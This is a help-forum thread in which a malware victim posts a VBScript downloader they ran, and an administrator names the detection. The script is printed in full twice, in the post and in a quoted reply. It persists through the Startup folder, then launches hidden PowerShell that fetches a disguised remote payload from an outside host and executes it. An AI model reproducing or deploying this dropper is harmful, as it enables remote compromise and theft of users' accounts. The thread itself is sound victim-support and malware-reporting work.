Jump to content

What is this virus and how can i go about cleaning?


NotMikaa
 Share

Recommended Posts

Hi!

So i came about this being dumb and installed it.
Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was  opened and they were attempting to go into my gmail.
They've already looked into my paypal.

 

dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

Link to comment
Share on other sites

  • Administrators

A detection was added several days ago, the script is detected as VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script.

Link to comment
Share on other sites

  • Most Valued Members
On 12/1/2019 at 7:58 AM, NotMikaa said:

Hi!

So i came about this being dumb and installed it.
Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was  opened and they were attempting to go into my gmail.
They've already looked into my paypal.

 


dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is

Put a good password and limit access only to your PCs.

Because they have got access to several accounts of yours , you should change all passwords now , and secure them with 2-step verification for more secure entry to your accounts.

Edited by Rami
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...